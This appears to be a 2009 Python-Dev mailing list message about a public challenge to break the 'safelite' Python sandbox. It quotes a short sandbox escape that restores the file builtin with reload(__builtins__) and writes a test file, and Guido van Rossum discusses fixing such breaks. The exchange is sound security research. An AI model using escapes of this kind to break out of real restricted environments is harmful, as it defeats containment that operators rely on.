On Mon, Feb 23, 2009 at 1:36 PM, Guido van Rossum <gu...@python.org> wrote:
> On Mon, Feb 23, 2009 at 1:12 PM, Victor Stinner
> <victor.stin...@haypocalc.com> wrote:
>>> The challenge is simple:
>>>
>>> * Open a fresh Python interpreter
>>> * Do: >>> from safelite import FileReader
>>> * You can use FileReader to read files on your filesystem
>>> * Now find a way to *write* to the filesystem from your interpreter
>>
>> Well, the challenge is to get access to a module. And... it's quite simple
>> :-p
>>
>> $ ./python
>>>>> from safelite import FileReader
>>>>> __builtins__.file
>> Traceback (most recent call last):
>> File "<stdin>", line 1, in <module>
>> AttributeError: 'module' object has no attribute 'file'
>>>>> reload(__builtins__)
>> <module '__builtin__' (built-in)>
>>>>> file('0wn3d', 'w').write('w00t\n')
>>>>>
>> $ cat 0wn3d
>> w00t
>>
>>> Dinner and drinks on me for an evening -- when you are next in London
>>> or I am in your town -- to the first person who manages to break
>>> safelite.py and write to the filesystem.
>>
>> Cool. It's a good reason to go to Pycon UK this yeak ;-)
>
> Tav should have made another stipulation: the attack must not be
> trivial to fix. This one seems trivial, e.g. by adding 'reload' to the
> list in secure_python_builtins().
I take it back, we need to find all the trivial ones too.
BTW Tav, you ought to create a small website for this challenge. A
blog post or wiki page would suffice.
--
--Guido van Rossum (home page: http://www.python.org/~guido/)
_______________________________________________
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe:
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
